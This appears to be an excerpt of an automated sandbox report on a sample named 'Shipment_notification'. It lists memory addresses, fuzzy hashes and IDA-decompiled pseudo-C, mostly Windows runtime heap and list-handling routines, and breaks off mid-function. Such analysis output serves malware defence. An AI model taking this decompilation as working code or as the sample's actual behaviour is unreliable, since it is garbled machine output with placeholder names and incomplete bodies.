                                                                                0x01b614e8
                                                                                0x01b290d8
                                                                                0x01b290da
                                                                                0x01b290dd
                                                                                0x01b290e5
                                                                                0x00000000
                                                                                0x01b29139
                                                                                0x01b290fa
                                                                                0x01b290fe
                                                                                0x01b29142
                                                                                0x00000000
                                                                                0x01b29142
                                                                                0x01b29104
                                                                                0x01b29107
                                                                                0x01b2910b
                                                                                0x01b29110
                                                                                0x01b29118
                                                                                0x01b29147
                                                                                0x01b29148
                                                                                0x01b2914f
                                                                                0x01b29150
                                                                                0x01b29151
                                                                                0x01b29152
                                                                                0x01b29156
                                                                                0x01b2915d
                                                                                0x01b29160
                                                                                0x01b29168
                                                                                0x01b2916c
                                                                                0x01b291bc
                                                                                0x01b291be
                                                                                0x00000000
                                                                                0x01b291be
                                                                                0x01b2916e
                                                                                0x01b29173
                                                                                0x01b29176
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b2917c
                                                                                0x01b29180
                                                                                0x01b291b5
                                                                                0x00000000
                                                                                0x01b291b5
                                                                                0x01b29182
                                                                                0x01b29185
                                                                                0x01b29189
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b2918e
                                                                                0x01b29190
                                                                                0x01b29198
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b291a0
                                                                                0x00000000
                                                                                0x01b291ad
                                                                                0x01b291ad
                                                                                0x01b291b0
                                                                                0x01b291b1
                                                                                0x00000000
                                                                                0x01b29185
                                                                                0x01b2911a
                                                                                0x01b2911c
                                                                                0x01b2911f
                                                                                0x01b29125
                                                                                0x01b29127
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                • Instruction ID: 870470fd0a076d674d9f835ee08a30675db17180ca10fca9440fc1ab70bff887
                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                • Instruction Fuzzy Hash: 37218E71A00225EFDB25DF5AC844AAAFBF8EF54354F1488AAE94DA7200D330ED04CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B13B7A Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E01B13B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x1bd84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x1bd84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1bd84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E01B2AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E01B2FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1bd84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x1bd84c4; // 0x0
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                0x01b13b89
                                                                                0x01b13b96
                                                                                0x01b13ba1
                                                                                0x01b13bab
                                                                                0x01b13bb5
                                                                                0x01b13bb9
                                                                                0x01b56298
                                                                                0x01b13bbf
                                                                                0x01b13bc2
                                                                                0x01b13bc3
                                                                                0x01b13bc9
                                                                                0x01b13bca
                                                                                0x01b13bcc
                                                                                0x01b13bcd
                                                                                0x01b13bd4
                                                                                0x01b13bd6
                                                                                0x01b13bdb
                                                                                0x01b13bea
                                                                                0x01b13bf7
                                                                                0x01b13bfb
                                                                                0x01b13bff
                                                                                0x01b13c09
                                                                                0x01b13c0a
                                                                                0x01b13c0b
                                                                                0x01b13c0f
                                                                                0x01b13c14
                                                                                0x01b13c18
                                                                                0x01b13c18
                                                                                0x01b13bfb
                                                                                0x01b13c1b
                                                                                0x01b13c30
                                                                                0x01b13c30
                                                                                0x01b13c3d

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aacd1f4c03a5d7b18a1a2d538ace0454eda80441c6a7e3a26c71faf1ae7ffd1b
                                                                                • Instruction ID: cfea3fc55830cef5ef0b639563819d886a2c01ec1a1302a8b101db9c5290841e
                                                                                • Opcode Fuzzy Hash: aacd1f4c03a5d7b18a1a2d538ace0454eda80441c6a7e3a26c71faf1ae7ffd1b
                                                                                • Instruction Fuzzy Hash: AA218072600119EFCB19DF58CD81F5ABBBDFF44758F1500A8EA08AB251E771AD058B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B66CF0 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E01B66CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01B07D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01B07D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1ac5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E01B1F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E01B1F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01B67016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01B02400( &_v52);
								}
								_t21 = L01B02400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                0x01b66cfb
                                                                                0x01b66d00
                                                                                0x01b66d02
                                                                                0x01b66d06
                                                                                0x01b66d0a
                                                                                0x01b66d0e
                                                                                0x01b66d19
                                                                                0x01b66d2b
                                                                                0x01b66d1b
                                                                                0x01b66d24
                                                                                0x01b66d24
                                                                                0x01b66d33
                                                                                0x01b66d39
                                                                                0x01b66d46
                                                                                0x01b66d4f
                                                                                0x01b66d61
                                                                                0x01b66d51
                                                                                0x01b66d5a
                                                                                0x01b66d5a
                                                                                0x01b66d69
                                                                                0x01b66d6b
                                                                                0x01b66d6d
                                                                                0x01b66d6f
                                                                                0x01b66d6f
                                                                                0x01b66d74
                                                                                0x01b66d79
                                                                                0x01b66d7a
                                                                                0x01b66d7f
                                                                                0x01b66d82
                                                                                0x01b66d88
                                                                                0x01b66d89
                                                                                0x01b66d90
                                                                                0x01b66d94
                                                                                0x01b66da7
                                                                                0x01b66db1
                                                                                0x01b66db1
                                                                                0x01b66dbb
                                                                                0x01b66dbb
                                                                                0x01b66d90
                                                                                0x01b66d69
                                                                                0x01b66d46
                                                                                0x01b66dc6

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d46b2e3ff82b8bb0032ab365a40abd3f75be3c9da044aec763503df87dbbeef8
                                                                                • Instruction ID: b82aac695b6bb86a8b898fb588e993ffe9d158da512b13611525efdbefe0e864
                                                                                • Opcode Fuzzy Hash: d46b2e3ff82b8bb0032ab365a40abd3f75be3c9da044aec763503df87dbbeef8
                                                                                • Instruction Fuzzy Hash: 842107725043459BD71ADF29C944B6BBBECEFB1780F0405E6FA40C7291EB38D548C6A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB070D Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E01BB070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E01BB07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E01BAAFDE( &_v8,  &_v12);
					E01BB1293(_t38, _v28, _t60);
					if(E01B07D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E01BA14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                0x01bb071b
                                                                                0x01bb0724
                                                                                0x01bb0734
                                                                                0x01bb0738
                                                                                0x01bb074b
                                                                                0x01bb074b
                                                                                0x01bb0753
                                                                                0x01bb0753
                                                                                0x01bb0759
                                                                                0x01bb075d
                                                                                0x01bb0774
                                                                                0x01bb0779
                                                                                0x01bb077d
                                                                                0x01bb0789
                                                                                0x01bb0795
                                                                                0x01bb07a7
                                                                                0x01bb0797
                                                                                0x01bb07a0
                                                                                0x01bb07a0
                                                                                0x01bb07af
                                                                                0x01bb07c4
                                                                                0x01bb07cd
                                                                                0x01bb07cd
                                                                                0x01bb07af
                                                                                0x01bb07dc

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                • Instruction ID: 375ab42a16de756a3d71605a2a7235a75673a011db5589c4d485203564b8789b
                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                • Instruction Fuzzy Hash: 78213776204200AFD709EF1CC880BBBBBA5EFD0350F0486A9F9948B781CB70D909CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B67794 Relevance: .1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E01B67794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1bd7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E01B2F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01B07D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01B29AE0();
					_t24 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                0x01b67799
                                                                                0x01b6779a
                                                                                0x01b6779b
                                                                                0x01b677a3
                                                                                0x01b677ab
                                                                                0x01b677ae
                                                                                0x01b677b1
                                                                                0x01b677b1
                                                                                0x01b677bf
                                                                                0x01b677c4
                                                                                0x01b677c8
                                                                                0x01b677ce
                                                                                0x01b677d4
                                                                                0x01b677e0
                                                                                0x01b677e0
                                                                                0x01b677d6
                                                                                0x01b677d6
                                                                                0x01b677de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b677de
                                                                                0x01b677e5
                                                                                0x01b677f0
                                                                                0x01b677f3
                                                                                0x01b677f6
                                                                                0x01b677fd
                                                                                0x01b67800
                                                                                0x01b6780c
                                                                                0x01b67818
                                                                                0x01b6782b
                                                                                0x01b6781a
                                                                                0x01b67823
                                                                                0x01b67823
                                                                                0x01b67830
                                                                                0x01b67831
                                                                                0x01b67838
                                                                                0x01b6783d
                                                                                0x01b6783e
                                                                                0x01b6784f
                                                                                0x01b6784f
                                                                                0x01b6785a

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8151e9ec0e938c44ba6ce8e7f31dc91af1117396d2a80c1ac58a9e6f950174b0
                                                                                • Instruction ID: 36929f3b13682aecf3b32af021fce7eb22b072fa28aed7d05623259dc7fe5182
                                                                                • Opcode Fuzzy Hash: 8151e9ec0e938c44ba6ce8e7f31dc91af1117396d2a80c1ac58a9e6f950174b0
                                                                                • Instruction Fuzzy Hash: 9D216272500604ABCB29DF69D890E67BBADEF58740F1045ADF609D7650EB34E900CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1FD9B Relevance: .1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E01B1FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E01AF76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                0x01b1fd9b
                                                                                0x01b1fda0
                                                                                0x01b1fda1
                                                                                0x01b1fdab
                                                                                0x01b1fdad
                                                                                0x01b1fdb0
                                                                                0x01b1fdb8
                                                                                0x01b1fe0f
                                                                                0x01b1fde6
                                                                                0x01b1fde9
                                                                                0x01b1fdec
                                                                                0x01b5c0c0
                                                                                0x01b1fdfe
                                                                                0x01b1fe06
                                                                                0x01b1fe06
                                                                                0x01b5c0c8
                                                                                0x01b1fe2d
                                                                                0x01b1fe2d
                                                                                0x00000000
                                                                                0x01b1fe2d
                                                                                0x01b5c0d1
                                                                                0x01b5c0e0
                                                                                0x01b5c0e5
                                                                                0x01b5c0e5
                                                                                0x01b5c0e8
                                                                                0x00000000
                                                                                0x01b5c0e8
                                                                                0x01b1fdf4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1fdf6
                                                                                0x01b1fdfa
                                                                                0x01b1fe1a
                                                                                0x01b1fe1f
                                                                                0x01b1fe1f
                                                                                0x01b1fdfc
                                                                                0x00000000
                                                                                0x01b1fdfc
                                                                                0x01b1fdcc
                                                                                0x01b1fdd0
                                                                                0x01b1fe26
                                                                                0x00000000
                                                                                0x01b1fe26
                                                                                0x01b1fdd8
                                                                                0x01b1fddb
                                                                                0x01b1fddd
                                                                                0x01b1fde0
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                • Instruction ID: c0e53c93fd6a1f69cda0814ceeb3f78df68ad1da344670e50113725798d98888
                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                • Instruction Fuzzy Hash: 1D21AC72600A40DBD739CF4DC640A76FBE5EB98A10F6681BEE94587619D730AC05CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1B390 Relevance: .1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E01B1B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01B02280(_t12, 0x1bd8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E01B200C2(0x1bd8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                0x01b1b395
                                                                                0x01b1b3a2
                                                                                0x01b1b3a5
                                                                                0x01b1b3aa
                                                                                0x01b1b3b2
                                                                                0x01b1b3ba
                                                                                0x01b1b3bd
                                                                                0x01b1b3c0
                                                                                0x01b1b3c4
                                                                                0x01b1b3c9
                                                                                0x01b5a3e9
                                                                                0x01b5a3ed
                                                                                0x01b5a3f0
                                                                                0x01b5a3ff
                                                                                0x01b5a403
                                                                                0x01b5a409
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5a40b
                                                                                0x01b5a40b
                                                                                0x01b5a40f
                                                                                0x01b5a415
                                                                                0x01b5a423
                                                                                0x01b5a423
                                                                                0x01b5a415
                                                                                0x01b1b3d1
                                                                                0x01b1b3e8
                                                                                0x01b1b3e8
                                                                                0x01b1b3d9

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67650ac358e4e2e007e25af04b0cae36f37d4e51092114b7772bd6229d2b7db1
                                                                                • Instruction ID: c117e5a380b40652b334eed968c7a25cbc802b87d016a56fbc302dc1d4736012
                                                                                • Opcode Fuzzy Hash: 67650ac358e4e2e007e25af04b0cae36f37d4e51092114b7772bd6229d2b7db1
                                                                                • Instruction Fuzzy Hash: 1C116B333011109BCB1E9A699EC1A2B7766EBC9730B6502B9ED16D7380DB31AC02C6D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE9240 Relevance: .1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E01AE9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x1bbf708);
				E01B3D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E01B295D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E01B295D0();
				_t33 =  *0x1bd84c4; // 0x0
				L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x1bd84c4; // 0x0
				L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x1bd84c4; // 0x0
				E01B02280(L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1bd86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E01B295D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E01B295D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01AE9325();
					_t50 =  *0x1bd84c4; // 0x0
					return E01B3D0D1(L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                0x01ae9240
                                                                                0x01ae9242
                                                                                0x01ae9247
                                                                                0x01ae924c
                                                                                0x01ae924e
                                                                                0x01ae9255
                                                                                0x01ae9257
                                                                                0x01ae925a
                                                                                0x01ae925f
                                                                                0x01ae925f
                                                                                0x01ae9266
                                                                                0x01ae9271
                                                                                0x01ae9276
                                                                                0x01ae9279
                                                                                0x01ae927e
                                                                                0x01ae9295
                                                                                0x01ae929a
                                                                                0x01ae92b1
                                                                                0x01ae92b6
                                                                                0x01ae92d7
                                                                                0x01ae92dc
                                                                                0x01ae92e0
                                                                                0x01ae92e6
                                                                                0x01ae92e8
                                                                                0x01ae92ee
                                                                                0x01ae9332
                                                                                0x01ae9333
                                                                                0x01ae9337
                                                                                0x01ae9338
                                                                                0x01ae933a
                                                                                0x01ae933a
                                                                                0x01ae933d
                                                                                0x01ae9342
                                                                                0x01ae9342
                                                                                0x01ae9345
                                                                                0x01ae9349
                                                                                0x01ae934e
                                                                                0x01ae9352
                                                                                0x01ae9357
                                                                                0x01ae92f4
                                                                                0x01ae92f4
                                                                                0x01ae92f6
                                                                                0x01ae92f9
                                                                                0x01ae9300
                                                                                0x01ae9306
                                                                                0x01ae9324
                                                                                0x01ae9324

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6e7ebb6e2667314847b14797e1e54b6fbd461842290bab05862fd845defb2c16
                                                                                • Instruction ID: 0ac70e1396bd2f1a62b17cffe90c59b2488db8021fff81c30e38882582f26325
                                                                                • Opcode Fuzzy Hash: 6e7ebb6e2667314847b14797e1e54b6fbd461842290bab05862fd845defb2c16
                                                                                • Instruction Fuzzy Hash: 89216D71141602DFCB2AEF68CA54F1AB7F9FF18708F0445ACE049876A2DB34E941CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B74257 Relevance: .1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 90%
                                                                                			E01B74257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x1bc08d0);
				E01B3D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E01B741E8(__ebx, __edi, __ecx, _t39);
				E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x1bd87e4;
					_t18 =  *0x1bd87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1bd5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x1bd87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x1bd87e4 = _t18;
